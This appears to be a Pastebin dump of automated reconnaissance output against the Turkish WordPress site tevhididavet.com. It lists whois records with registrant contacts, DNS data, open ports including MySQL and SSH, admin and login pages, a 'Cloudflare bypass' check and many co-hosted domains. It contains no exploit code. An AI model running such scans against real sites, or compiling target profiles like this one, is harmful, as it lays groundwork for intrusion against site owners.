Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #######################################################################################################################################
- =======================================================================================================================================
- Hostname tevhididavet.com ISP Medyabim Internet Hizmetleri
- Continent Asia Flag
- TR
- Country Turkey Country Code TR
- Region Unknown Local time 23 Jun 2019 02:08 +03
- City Unknown Postal Code Unknown
- IP Address 93.89.20.20 Latitude 41.021
- Longitude 28.995
- =======================================================================================================================================
- #######################################################################################################################################
- > tevhididavet.com
- Server: 185.93.180.131
- Address: 185.93.180.131#53
- Non-authoritative answer:
- Name: tevhididavet.com
- Address: 93.89.20.20
- #######################################################################################################################################
- Domain Name: TEVHIDIDAVET.COM
- Registry Domain ID: 1707504235_DOMAIN_COM-VRSN
- Registrar WHOIS Server: whois.PublicDomainRegistry.com
- Registrar URL: http://www.publicdomainregistry.com
- Updated Date: 2019-05-08T22:31:42Z
- Creation Date: 2012-03-16T13:33:15Z
- Registry Expiry Date: 2021-03-16T13:33:15Z
- Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
- Registrar IANA ID: 303
- Registrar Abuse Contact Email: abuse-contact@publicdomainregistry.com
- Registrar Abuse Contact Phone: +1.2013775952
- Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
- Name Server: NS1.MEDYABIM.COM
- Name Server: NS2.MEDYABIM.COM
- DNSSEC: unsigned
- URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
- #######################################################################################################################################
- The Registry database contains ONLY .COM, .NET, .EDU domains and
- Registrars.
- Domain Name: TEVHIDIDAVET.COM
- Registry Domain ID: 1707504235_DOMAIN_COM-VRSN
- Registrar WHOIS Server: whois.publicdomainregistry.com
- Registrar URL: www.publicdomainregistry.com
- Updated Date: 2019-05-08T22:31:43Z
- Creation Date: 2012-03-16T13:33:15Z
- Registrar Registration Expiration Date: 2021-03-16T13:33:15Z
- Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
- Registrar IANA ID: 303
- Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
- Registry Registrant ID: Not Available From Registry
- Registrant Name: TEVHIDI DAVET
- Registrant Organization: ---
- Registrant Street: Merkez cad istanbul
- Registrant City: ISTANBULAS
- Registrant State/Province:
- Registrant Postal Code: 00034
- Registrant Country: TR
- Registrant Phone: +90.5558259900
- Registrant Phone Ext:
- Registrant Fax:
- Registrant Fax Ext:
- Registrant Email: tevhididavetcom@gmail.com
- Registry Admin ID: Not Available From Registry
- Admin Name: TEVHIDI DAVET
- Admin Organization: ---
- Admin Street: Merkez cad istanbul
- Admin City: ISTANBULAS
- Admin State/Province:
- Admin Postal Code: 00034
- Admin Country: TR
- Admin Phone: +90.5558259900
- Admin Phone Ext:
- Admin Fax:
- Admin Fax Ext:
- Admin Email: tevhididavetcom@gmail.com
- Registry Tech ID: Not Available From Registry
- Tech Name: TEVHIDI DAVET
- Tech Organization: ---
- Tech Street: Merkez cad istanbul
- Tech City: ISTANBULAS
- Tech State/Province:
- Tech Postal Code: 00034
- Tech Country: TR
- Tech Phone: +90.5558259900
- Tech Phone Ext:
- Tech Fax:
- Tech Fax Ext:
- Tech Email: tevhididavetcom@gmail.com
- Name Server: ns1.medyabim.com
- Name Server: ns2.medyabim.com
- DNSSEC: Unsigned
- #######################################################################################################################################
- [+] Target : tevhididavet.com
- [+] IP Address : 93.89.20.20
- [+] Headers :
- [+] Date : Sat, 22 Jun 2019 23:34:05 GMT
- [+] Server : Apache/2
- [+] Upgrade : h2,h2c
- [+] Connection : Upgrade, Keep-Alive
- [+] Link : <http://tevhididavet.com/wp-json/>; rel="https://api.w.org/"
- [+] Vary : Accept-Encoding,User-Agent
- [+] Content-Encoding : gzip
- [+] Content-Length : 13446
- [+] Keep-Alive : timeout=2, max=100
- [+] Content-Type : text/html; charset=UTF-8
- [+] SSL Certificate Information :
- [+] countryName : US
- [+] stateOrProvinceName : Someprovince
- [+] localityName : Sometown
- [+] organizationName : none
- [+] organizationalUnitName : none
- [+] commonName : localhost
- [+] emailAddress : webmaster@localhost
- [+] countryName : US
- [+] stateOrProvinceName : Someprovince
- [+] localityName : Sometown
- [+] organizationName : none
- [+] organizationalUnitName : none
- [+] commonName : localhost
- [+] emailAddress : webmaster@localhost
- [+] Version : 1
- [+] Serial Number : E4EE01681ADBE253
- [+] Not Before : Jun 15 12:50:24 2017 GMT
- [+] Not After : Oct 30 12:50:24 2044 GMT
- [+] Whois Lookup :
- [+] NIR : None
- [+] ASN Registry : ripencc
- [+] ASN : 44922
- [+] ASN CIDR : 93.89.20.0/24
- [+] ASN Country Code : TR
- [+] ASN Date : 2008-04-01
- [+] ASN Description : MEDYABIM-AS, TR
- [+] cidr : 93.89.20.0/24
- [+] name : NET-MEDYABIM-DC
- [+] handle : EE762-RIPE
- [+] range : 93.89.20.0 - 93.89.20.255
- [+] description : MEDYABIM DATACENTER I
- [+] country : TR
- [+] state : None
- [+] city : None
- [+] address : Kukurtlu Mah. Oulu Cad. Oylum Gokberk Sit. F Blok K3 D13 BURSA - TURKEY
- [+] postal_code : None
- [+] emails : None
- [+] created : 2012-10-19T15:24:36Z
- [+] updated : 2012-10-19T15:24:36Z
- [+] Crawling Target...
- [+] Looking for robots.txt........[ Found ]
- [+] Extracting robots Links.......[ 2 ]
- [+] Looking for sitemap.xml.......[ Found ]
- [+] Extracting sitemap Links......[ 61 ]
- [+] Extracting CSS Links..........[ 6 ]
- [+] Extracting Javascript Links...[ 16 ]
- [+] Extracting Internal Links.....[ 53 ]
- [+] Extracting External Links.....[ 5 ]
- [+] Extracting Images.............[ 3 ]
- [+] Total Links Extracted : 146
- [+] Dumping Links in /opt/FinalRecon/dumps/tevhididavet.com.dump
- [+] Completed!
- #######################################################################################################################################
- [+] Starting At 2019-06-22 19:34:10.055684
- [+] Collecting Information On: tevhididavet.com
- [#] Status: 200
- ---------------------------------------------------------------------------------------------------------------------------------------
- [#] Web Server Detected: Apache/2
- [!] X-Frame-Options Headers not detect! target might be vulnerable Click Jacking
- - Date: Sat, 22 Jun 2019 23:34:07 GMT
- - Server: Apache/2
- - Upgrade: h2,h2c
- - Connection: Upgrade, Keep-Alive
- - Link: <http://tevhididavet.com/wp-json/>; rel="https://api.w.org/"
- - Vary: Accept-Encoding,User-Agent
- - Content-Encoding: gzip
- - Content-Length: 13446
- - Keep-Alive: timeout=2, max=100
- - Content-Type: text/html; charset=UTF-8
- ---------------------------------------------------------------------------------------------------------------------------------------
- [#] Finding Location..!
- [#] as: AS44922 MEDYABIM INTERNET HIZMETLERI
- [#] city: Bursa
- [#] country: Turkey
- [#] countryCode: TR
- [#] isp: MEDYABIM
- [#] lat: 40.1828
- [#] lon: 29.0671
- [#] org:
- [#] query: 93.89.20.20
- [#] region: 16
- [#] regionName: Bursa
- [#] status: success
- [#] timezone: Europe/Istanbul
- [#] zip:
- --------------------------------------------------------------------------------------------------------------------------------------
- [x] Didn't Detect WAF Presence on: http://tevhididavet.com/
- ---------------------------------------------------------------------------------------------------------------------------------------
- [#] Starting Reverse DNS
- [!] Found 23 any Domain
- - actinsaatmimarlik.com
- - angoraevleri.org
- - ardamatbaacilik.com
- - escapeavcilar.com
- - esergrupyatirim.com
- - f2ftesting.com
- - istanbuldageziyorum.com
- - karatasambalaj.com
- - marsyapias.com
- - sunkarmakina.com
- - sykteks.com
- - temakkalip.com
- - tevhididavet.com
- - www.arelmedical.com
- - www.arenaelektronik.com
- - www.bilgintekno.net
- - www.caramellgroup.com
- - www.dcbmachine.com
- - www.giainnovative.com
- - www.northcyprusestate.com
- - www.reddevilsturkey.com
- - www.saltamakine.com
- - www.tospagam.com
- ---------------------------------------------------------------------------------------------------------------------------------------
- [!] Scanning Open Port
- [#] 21/tcp open ftp
- [#] 22/tcp open ssh
- [#] 53/tcp open domain
- [#] 80/tcp open http
- [#] 110/tcp open pop3
- [#] 143/tcp open imap
- [#] 443/tcp open https
- [#] 465/tcp open smtps
- [#] 587/tcp open submission
- [#] 993/tcp open imaps
- [#] 995/tcp open pop3s
- [#] 2222/tcp open EtherNetIP-1
- [#] 3306/tcp open mysql
- ---------------------------------------------------------------------------------------------------------------------------------------
- [+] Collecting Information Disclosure!
- #######################################################################################################################################
- [i] Scanning Site: http://tevhididavet.com
- B A S I C I N F O
- ====================
- [+] Site Title: Tevhidi Davet | Tevhide Davet Eder
- [+] IP address: 93.89.20.20
- [+] Web Server: Apache/2
- [+] CMS: WordPress
- [+] Cloudflare: Not Detected
- [+] Robots File: Found
- -------------[ contents ]----------------
- User-agent: *
- Disallow: /wp-admin/
- Allow: /wp-admin/admin-ajax.php
- Sitemap: http://tevhididavet.com/sitemap.xml
- -----------[end of contents]-------------
- #######################################################################################################################################
- W H O I S L O O K U P
- ========================
- Domain Name: TEVHIDIDAVET.COM
- Registry Domain ID: 1707504235_DOMAIN_COM-VRSN
- Registrar WHOIS Server: whois.PublicDomainRegistry.com
- Registrar URL: http://www.publicdomainregistry.com
- Updated Date: 2019-05-08T22:31:42Z
- Creation Date: 2012-03-16T13:33:15Z
- Registry Expiry Date: 2021-03-16T13:33:15Z
- Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
- Registrar IANA ID: 303
- Registrar Abuse Contact Email: abuse-contact@publicdomainregistry.com
- Registrar Abuse Contact Phone: +1.2013775952
- Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
- Name Server: NS1.MEDYABIM.COM
- Name Server: NS2.MEDYABIM.COM
- DNSSEC: unsigned
- #######################################################################################################################################
- G E O I P L O O K U P
- =========================
- [i] IP Address: 93.89.20.20
- [i] Country: Turkey
- [i] State:
- [i] City:
- [i] Latitude: 41.0214
- [i] Longitude: 28.9948
- #######################################################################################################################################
- H T T P H E A D E R S
- =======================
- [i] HTTP/1.0 200 OK
- [i] Date: Sat, 22 Jun 2019 23:34:32 GMT
- [i] Server: Apache/2
- [i] Upgrade: h2,h2c
- [i] Connection: Upgrade, close
- [i] Link: <http://tevhididavet.com/wp-json/>; rel="https://api.w.org/"
- [i] Vary: Accept-Encoding,User-Agent
- [i] Content-Type: text/html; charset=UTF-8
- #######################################################################################################################################
- D N S L O O K U P
- ===================
- tevhididavet.com. 14399 IN MX 10 mail.tevhididavet.com.
- tevhididavet.com. 14399 IN TXT "v=spf1 a mx ip4:93.89.20.20 ~all"
- tevhididavet.com. 14399 IN A 93.89.20.20
- tevhididavet.com. 14399 IN SOA ns1.medyabim.com. hostmaster.tevhididavet.com. 2018070100 14400 3600 1209600 86400
- tevhididavet.com. 14399 IN NS ns2.medyabim.com.
- tevhididavet.com. 14399 IN NS ns1.medyabim.com.
- #######################################################################################################################################
- S U B N E T C A L C U L A T I O N
- ====================================
- Address = 93.89.20.20
- Network = 93.89.20.20 / 32
- Netmask = 255.255.255.255
- Broadcast = not needed on Point-to-Point links
- Wildcard Mask = 0.0.0.0
- Hosts Bits = 0
- Max. Hosts = 1 (2^0 - 0)
- Host Range = { 93.89.20.20 - 93.89.20.20 }
- #######################################################################################################################################
- N M A P P O R T S C A N
- ============================
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-22 23:34 UTC
- Nmap scan report for tevhididavet.com (93.89.20.20)
- Host is up (0.13s latency).
- rDNS record for 93.89.20.20: 93-89-20-20.static.internetadresi.com
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 23/tcp closed telnet
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 3389/tcp closed ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds
- #######################################################################################################################################
- S U B - D O M A I N F I N D E R
- ==================================
- [i] Total Subdomains Found : 1
- [+] Subdomain: www.tevhididavet.com
- [-] IP: 93.89.20.20
- #######################################################################################################################################
- Enter Address Website = tevhididavet.com
- Reversing IP With HackTarget 'tevhididavet.com'
- --------------------------------------------------
- [+] abbyedekparca.com
- [+] abdullahsaid.com
- [+] adilcal.com
- [+] akgulbobinaj.com
- [+] alentelektrik.com
- [+] almiracaferestaurant.com
- [+] arabulucuvolkanaksu.com
- [+] arelmedical.com
- [+] asklimited.net
- [+] atfsystem.com
- [+] atilimfair.net
- [+] avcteknoloji.com.tr.avcteknoloji.com.tr
- [+] aymaniplik.com
- [+] ayyildizipek.com
- [+] beycepetrol.com
- [+] birform.com
- [+] bizimarabulucu.com
- [+] bizimarabulucumuz.com
- [+] bossmakina.com
- [+] bursaarabuluculukmerkezi.org
- [+] bursabeta.com
- [+] bursacocukpsikolog.com
- [+] bursahafiza.com
- [+] bursayaymetal.com
- [+] bystarlet.com
- [+] cafeolive.com
- [+] cagyapiboya.com
- [+] cenarttanitim.com
- [+] chillersistem.com
- [+] cozumotomotiv.net
- [+] cpanel.avcteknoloji.com.tr
- [+] csmelektromekanik.com
- [+] daglardagitim.com
- [+] dcbmachine.com
- [+] dcbmakine.com
- [+] dc-49e138707ead.turkiyesaglikmezunlari.com
- [+] dehlizinsaat.com
- [+] demirkayaotomat.com
- [+] dijiteks.biz
- [+] drufukaydin.com
- [+] egedenizreklam.com
- [+] eksiogluevleri.com
- [+] eksiogluevlerikarasu.com
- [+] eksioglukarasu.com
- [+] eksioglukarasuevleri.com
- [+] eldemcws.com
- [+] emektaryangin.com
- [+] erdemtuna.com
- [+] erik.medyabim.com
- [+] erkinle.com
- [+] esedullahsaid.com
- [+] evrenkara.com
- [+] galanzturkey.com
- [+] galanzturkiye.com
- [+] gamakalip.com
- [+] gokayholding.com
- [+] gokmettekstil.com
- [+] gurwood.com
- [+] guztur.com
- [+] guzturturizm.com
- [+] hstekstil.net
- [+] igtbilisim.com
- [+] inansogutma.com
- [+] istanbuldageziyorum.com
- [+] kafemela.com
- [+] karahanhukuk.org
- [+] karakilic.av.tr
- [+] karalp.com
- [+] karatasambalaj.com
- [+] karsenticaret.com
- [+] kayatekstilaksesuar.com
- [+] koruyanbranda.com
- [+] kumadaotel.com
- [+] lensevim.com
- [+] lialea.com
- [+] mail.abbyedekparca.com
- [+] mail.abdullahsaid.com
- [+] mail.adilcal.com
- [+] mail.akgulbobinaj.com
- [+] mail.alentelektrik.com
- [+] mail.almiracaferestaurant.com
- [+] mail.arabulucuvolkanaksu.com
- [+] mail.arelmedical.com
- [+] mail.asklimited.net
- [+] mail.atilimfair.net
- [+] mail.avcteknoloji.com.tr
- [+] mail.aymaniplik.com
- [+] mail.ayyildizipek.com
- [+] mail.beycepetrol.com
- [+] mail.birform.com
- [+] mail.bizimarabulucumuz.com
- [+] mail.bizimarabulucu.com
- [+] mail.bossmakina.com
- [+] mail.bursaarabuluculukmerkezi.org
- [+] mail.bursabeta.com
- [+] mail.bursacocukpsikolog.com
- [+] mail.bursahafiza.com
- [+] mail.bursayaymetal.com
- [+] mail.bystarlet.com
- [+] mail.bzmtekstil.com
- [+] mail.cafeolive.com
- [+] mail.cagyapiboya.com
- [+] mail.cenarttanitim.com
- [+] mail.chillersistem.com
- [+] mail.cozumotomotiv.net
- [+] mail.csmelektromekanik.com
- [+] mail.daglardagitim.com
- [+] mail.dcbmachine.com
- [+] mail.dcbmakine.com
- [+] mail.dehlizinsaat.com
- [+] mail.demirkayaotomat.com
- [+] mail.dijiteks.biz
- [+] mail.drufukaydin.com
- [+] mail.egedenizreklam.com
- [+] mail.eksiogluevlerikarasu.com
- [+] mail.eksiogluevleri.com
- [+] mail.eksioglukarasuevleri.com
- [+] mail.eksioglukarasu.com
- [+] mail.eldemcws.com
- [+] mail.emektaryangin.com
- [+] mail.erdemtuna.com
- [+] mail.erkinle.com
- [+] mail.esedullahsaid.com
- [+] mail.evrenkara.com
- [+] mail.galanzturkey.com
- [+] mail.galanzturkiye.com
- [+] mail.gamakalip.com
- [+] mail.gokayholding.com
- [+] mail.gokmettekstil.com
- [+] mail.gurwood.com
- [+] mail.guzturturizm.com
- [+] mail.guztur.com
- [+] mail.hstekstil.net
- [+] mail.igtbilisim.com
- [+] mail.inansogutma.com
- [+] mail.istanbuldageziyorum.com
- [+] mail.kafemela.com
- [+] mail.karahanhukuk.org
- [+] mail.karakilic.av.tr
- [+] mail.karalp.com
- [+] mail.karatasambalaj.com
- [+] mail.karsenticaret.com
- [+] mail.kayatekstilaksesuar.com
- [+] mail.koruyanbranda.com
- [+] mail.kumadaotel.com
- [+] mail.lensevim.com
- [+] mail.mavservis.com
- [+] mail.melihoto.com
- [+] mail.miniks.com
- [+] mail.netkiralama.net
- [+] mail.noktatd.com
- [+] mail.ortanadoluecza.com
- [+] mail.otelayyildiz.com
- [+] mail.ozefebutik.com
- [+] mail.payteknik.com
- [+] mail.polyesteriplik.com
- [+] mail.r1otomasyon.com
- [+] mail.r1robotics.com
- [+] mail.rekormed.com
- [+] mail.robotservisi.com
- [+] mail.robotyedekparca.com
- [+] mail.saltamakine.com
- [+] mail.seccadeaksesuarlari.com
- [+] mail.seftelekom.com
- [+] mail.sekipetel.com
- [+] mail.sizinarabulucunuz.com
- [+] mail.sogutotel.com
- [+] mail.soietekstil.com
- [+] mail.sultanelektronik.com
- [+] mail.sykteks.com
- [+] mail.tandemirpetrol.com
- [+] mail.tarihiyapimaliyet.com
- [+] mail.teknikguc.com
- [+] mail.temakkalip.com
- [+] mail.tevhidakidesi.net
- [+] mail.tevhididavet.com
- [+] mail.thecokecollector.com
- [+] mail.tobay.org
- [+] mail.turged.org.tr
- [+] mail.turkeymedicalalumni.com
- [+] mail.uludagtooling.com
- [+] mail.uzayklima.com
- [+] mail.vaillantbursa.com
- [+] mail.yagizlarmetal.com
- [+] mail.yalindestek.com
- [+] mail.yataganasm2.com
- [+] mail.yekpa.com
- [+] mail.yesilbeyazreklam.com
- [+] mail.zahiroglu.com
- [+] mail.tek-bor.com
- [+] mail.xn--ekiolukarasuevleri-pqc19j.com
- [+] mavservis.com
- [+] melihoto.com
- [+] metpa.com
- [+] miniks.com
- [+] netkiralama.net
- [+] noktatd.com
- [+] ortanadoluecza.com
- [+] otelayyildiz.com
- [+] ozefebutik.com
- [+] polyesteriplik.com
- [+] r1.com.tr
- [+] r1otomasyon.com
- [+] r1robotics.com
- [+] rekormed.com
- [+] robotservisi.com
- [+] robotyedekparca.com
- [+] saltamakine.com
- [+] seccadeaksesuarlari.com
- [+] seftelekom.com
- [+] sizinarabulucu.com
- [+] sizinarabulucunuz.com
- [+] sogutotel.com
- [+] soietekstil.com
- [+] sultanelektronik.com
- [+] sykteks.com
- [+] tandemirpetrol.com
- [+] tarihiyapimaliyet.com
- [+] teknikguc.com
- [+] teknik-guc.com
- [+] tek-bor.com
- [+] temakkalip.com
- [+] tevhidakidesi.net
- [+] tevhididavet.com
- [+] thecokecollector.com
- [+] tobay.org
- [+] turged.org.tr
- [+] uludagtooling.com
- [+] uzayklima.com
- [+] vaillantbursa.com
- [+] webdisk.avcteknoloji.com.tr
- [+] webmail.avcteknoloji.com.tr
- [+] www.abdullahsaid.com
- [+] www.akgulbobinaj.com
- [+] www.atfsystem.com
- [+] www.cafeolive.com
- [+] www.eldemcws.com
- [+] www.erkinle.com
- [+] www.guztur.com
- [+] www.igtbilisim.com
- [+] www.karakilic.av.tr
- [+] www.lensevim.com
- [+] www.lialea.com
- [+] www.noktatd.com
- [+] www.sevgibaglari.com.tr
- [+] www.sykteks.com
- [+] www.teknikguc.com
- [+] www.tevhidakidesi.net
- [+] www.tevhididavet.com
- [+] www.turged.org.tr
- [+] www.uzayklima.com
- [+] www.yekpa.com
- [+] xn--ekiolukarasuevleri-pqc19j.com
- [+] yagizlarmetal.com
- [+] yalindestek.com
- [+] yataganasm2.com
- [+] yekpa.com
- [+] yesilbeyazreklam.com
- [+] zahiroglu.com
- #######################################################################################################################################
- Reverse IP With YouGetSignal 'tevhididavet.com'
- --------------------------------------------------
- [*] IP: 93.89.20.20
- [*] Domain: tevhididavet.com
- [*] Total Domains: 23
- [+] actinsaatmimarlik.com
- [+] angoraevleri.org
- [+] ardamatbaacilik.com
- [+] escapeavcilar.com
- [+] esergrupyatirim.com
- [+] f2ftesting.com
- [+] istanbuldageziyorum.com
- [+] karatasambalaj.com
- [+] marsyapias.com
- [+] sunkarmakina.com
- [+] sykteks.com
- [+] temakkalip.com
- [+] tevhididavet.com
- [+] www.arelmedical.com
- [+] www.arenaelektronik.com
- [+] www.bilgintekno.net
- [+] www.caramellgroup.com
- [+] www.dcbmachine.com
- [+] www.giainnovative.com
- [+] www.northcyprusestate.com
- [+] www.reddevilsturkey.com
- [+] www.saltamakine.com
- [+] www.tospagam.com
- #######################################################################################################################################
- Geo IP Lookup 'tevhididavet.com'
- -----------------------------------
- [+] IP Address: 93.89.20.20
- [+] Country: Turkey
- [+] State:
- [+] City:
- [+] Latitude: 41.0214
- [+] Longitude: 28.9948
- #######################################################################################################################################
- Whois 'tevhididavet.com'
- ---------------------------
- [+] Domain Name: TEVHIDIDAVET.COM
- [+] Registry Domain ID: 1707504235_DOMAIN_COM-VRSN
- [+] Registrar WHOIS Server: whois.PublicDomainRegistry.com
- [+] Registrar URL: http://www.publicdomainregistry.com
- [+] Updated Date: 2019-05-08T22:31:42Z
- [+] Creation Date: 2012-03-16T13:33:15Z
- [+] Registry Expiry Date: 2021-03-16T13:33:15Z
- [+] Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
- [+] Registrar IANA ID: 303
- [+] Registrar Abuse Contact Email: abuse-contact@publicdomainregistry.com
- [+] Registrar Abuse Contact Phone: +1.2013775952
- [+] Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
- [+] Name Server: NS1.MEDYABIM.COM
- [+] Name Server: NS2.MEDYABIM.COM
- [+] DNSSEC: unsigned
- [+] URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
- [+] >>> Last update of whois database: 2019-06-22T23:33:41Z <<<
- [+] For more information on Whois status codes, please visit https://icann.org/epp
- [+] The Registry database contains ONLY .COM, .NET, .EDU domains and
- [+] Registrars.
- #######################################################################################################################################
- Bypass Cloudflare 'tevhididavet.com'
- ---------------------------------------
- [!] CloudFlare Bypass 93.89.20.20 | ftp.tevhididavet.com
- [!] CloudFlare Bypass 93.89.20.20 | mail.tevhididavet.com
- [!] CloudFlare Bypass 93.89.20.20 | www.tevhididavet.com
- [!] CloudFlare Bypass 93.89.20.20 | smtp.tevhididavet.com
- #######################################################################################################################################
- DNS Lookup 'tevhididavet.com'
- --------------------------------
- [+] tevhididavet.com. 14399 IN MX 10 mail.tevhididavet.com.
- [+] tevhididavet.com. 14399 IN TXT "v=spf1 a mx ip4:93.89.20.20 ~all"
- [+] tevhididavet.com. 14399 IN A 93.89.20.20
- [+] tevhididavet.com. 14399 IN SOA ns1.medyabim.com. hostmaster.tevhididavet.com. 2018070100 14400 3600 1209600 86400
- [+] tevhididavet.com. 14399 IN NS ns2.medyabim.com.
- [+] tevhididavet.com. 14399 IN NS ns1.medyabim.com.
- #######################################################################################################################################
- Show HTTP Header 'tevhididavet.com'
- --------------------------------------
- [+] HTTP/1.1 200 OK
- [+] Date: Sat, 22 Jun 2019 23:34:28 GMT
- [+] Server: Apache/2
- [+] Upgrade: h2,h2c
- [+] Connection: Upgrade
- [+] Link: ; rel="https://api.w.org/"
- [+] Vary: User-Agent
- [+] Content-Type: text/html; charset=UTF-8
- #######################################################################################################################################
- Port Scan 'tevhididavet.com'
- -------------------------------
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-22 23:34 UTC
- Nmap scan report for tevhididavet.com (93.89.20.20)
- Host is up (0.13s latency).
- rDNS record for 93.89.20.20: 93-89-20-20.static.internetadresi.com
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 23/tcp closed telnet
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 3389/tcp closed ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 0.97 seconds
- #######################################################################################################################################
- Cms Scan 'tevhididavet.com'
- ------------------------------
- [+] Cms : WordPress
- [+] Web Servers : Apache
- [+] Programming Languages : PHP
- #######################################################################################################################################
- Robot.txt 'tevhididavet.com'
- -------------------------------
- User-agent: *
- Disallow: /wp-admin/
- Allow: /wp-admin/admin-ajax.php
- Sitemap: http://tevhididavet.com/sitemap.xml
- #######################################################################################################################################
- Traceroute 'tevhididavet.com'
- --------------------------------
- Start: 2019-06-22T23:34:39+0000
- HOST: web01 Loss% Snt Last Avg Best Wrst StDev
- 1.|-- 45.79.12.202 0.0% 3 0.7 0.6 0.6 0.7 0.0
- 2.|-- 45.79.12.6 0.0% 3 0.9 0.7 0.5 0.9 0.2
- 3.|-- 45.79.12.8 0.0% 3 0.7 0.6 0.5 0.7 0.1
- 4.|-- ix-et-5-1-2-0.tcore1.dt8-dallas.as6453.net 0.0% 3 1.3 1.3 1.2 1.5 0.2
- 5.|-- if-ae-37-3.tcore1.aeq-ashburn.as6453.net 33.3% 3 162.3 162.1 161.9 162.3 0.3
- 6.|-- if-ae-2-2.tcore2.aeq-ashburn.as6453.net 0.0% 3 158.8 158.5 158.2 158.8 0.3
- 7.|-- if-ae-12-2.tcore4.njy-newark.as6453.net 0.0% 3 159.4 159.4 159.1 159.8 0.4
- 8.|-- if-ae-1-3.tcore3.njy-newark.as6453.net 0.0% 3 153.7 153.2 153.0 153.7 0.4
- 9.|-- if-ae-15-2.tcore1.l78-london.as6453.net 0.0% 3 157.1 157.2 157.1 157.6 0.3
- 10.|-- if-ae-2-2.tcore2.l78-london.as6453.net 0.0% 3 167.2 165.5 164.6 167.2 1.5
- 11.|-- if-ae-14-2.tcore2.av2-amsterdam.as6453.net 0.0% 3 154.5 154.6 154.5 154.7 0.1
- 12.|-- if-ae-44-39.tcore1.fnm-frankfurt.as6453.net 0.0% 3 175.3 174.4 173.6 175.3 0.8
- 13.|-- if-ae-8-2.tcore1.it5-istanbul.as6453.net 0.0% 3 160.2 159.8 159.6 160.2 0.3
- 14.|-- 5.23.0.38 0.0% 3 163.4 163.6 163.4 163.9 0.3
- 15.|-- 93-89-20-20.static.internetadresi.com 0.0% 3 167.3 167.6 167.2 168.3 0.6
- #######################################################################################################################################
- Avilable Links :
- Find Page >> http://tevhididavet.com/admin/
- Find Page >> http://tevhididavet.com/admin/index.php
- Find Page >> http://tevhididavet.com/wp-login.php
- #######################################################################################################################################
- Trying "tevhididavet.com"
- ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 23419
- ;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 2, ADDITIONAL: 2
- ;; QUESTION SECTION:
- ;tevhididavet.com. IN ANY
- ;; ANSWER SECTION:
- tevhididavet.com. 14400 IN SOA ns1.medyabim.com. hostmaster.tevhididavet.com. 2018070100 14400 3600 1209600 86400
- tevhididavet.com. 14400 IN A 93.89.20.20
- tevhididavet.com. 14400 IN TXT "v=spf1 a mx ip4:93.89.20.20 ~all"
- tevhididavet.com. 14400 IN MX 10 mail.tevhididavet.com.
- tevhididavet.com. 14400 IN NS ns1.medyabim.com.
- tevhididavet.com. 14400 IN NS ns2.medyabim.com.
- ;; AUTHORITY SECTION:
- tevhididavet.com. 14400 IN NS ns1.medyabim.com.
- tevhididavet.com. 14400 IN NS ns2.medyabim.com.
- ;; ADDITIONAL SECTION:
- ns2.medyabim.com. 34421 IN A 93.89.19.11
- ns1.medyabim.com. 34421 IN A 93.89.16.11
- Received 268 bytes from 2001:18c0:121:6900:724f:b8ff:fefd:5b6a#53 in 245 ms
- #######################################################################################################################################
- ; <<>> DiG 9.11.5-P4-5-Debian <<>> +trace tevhididavet.com
- ;; global options: +cmd
- . 79306 IN NS g.root-servers.net.
- . 79306 IN NS a.root-servers.net.
- . 79306 IN NS f.root-servers.net.
- . 79306 IN NS l.root-servers.net.
- . 79306 IN NS j.root-servers.net.
- . 79306 IN NS m.root-servers.net.
- . 79306 IN NS c.root-servers.net.
- . 79306 IN NS e.root-servers.net.
- . 79306 IN NS i.root-servers.net.
- . 79306 IN NS k.root-servers.net.
- . 79306 IN NS d.root-servers.net.
- . 79306 IN NS b.root-servers.net.
- . 79306 IN NS h.root-servers.net.
- . 79306 IN RRSIG NS 8 0 518400 20190705170000 20190622160000 25266 . wxU2g77X+8cbjLGBwlyQn5HrCWua4cN2lEMh/4y30+pv6gHAfKzt58GS XSUbSoTI0mJXTf6xnYNeyQbid2D37JeGIZfPdiqsjk5naeV4TmzrziUS P3SujKab7n6q+uZ6umOCl6zoHa7PrEGAFrwUm9lIw2EogZBSfZmFQC1c EzySg/9m8Gt0NFYPdMyUqB0/9P0iu0Jw10qN1WPeBn3Dm0pv4BwkOiXy avjqjDlD+Jrt1MXq+Rinturooyt0Sh7qIb2ED7HjJ7Wp2/qhTF9tpbKB Ga8/8QAMFn5YAzIJkkrqkNTSzSoRT18iD4ASdVjvSOa3lIxPSku1lgd0 xm/PeQ==
- ;; Received 525 bytes from 185.93.180.131#53(185.93.180.131) in 217 ms
- com. 172800 IN NS a.gtld-servers.net.
- com. 172800 IN NS b.gtld-servers.net.
- com. 172800 IN NS c.gtld-servers.net.
- com. 172800 IN NS d.gtld-servers.net.
- com. 172800 IN NS e.gtld-servers.net.
- com. 172800 IN NS f.gtld-servers.net.
- com. 172800 IN NS g.gtld-servers.net.
- com. 172800 IN NS h.gtld-servers.net.
- com. 172800 IN NS i.gtld-servers.net.
- com. 172800 IN NS j.gtld-servers.net.
- com. 172800 IN NS k.gtld-servers.net.
- com. 172800 IN NS l.gtld-servers.net.
- com. 172800 IN NS m.gtld-servers.net.
- com. 86400 IN DS 30909 8 2 E2D3C916F6DEEAC73294E8268FB5885044A833FC5459588F4A9184CF C41A5766
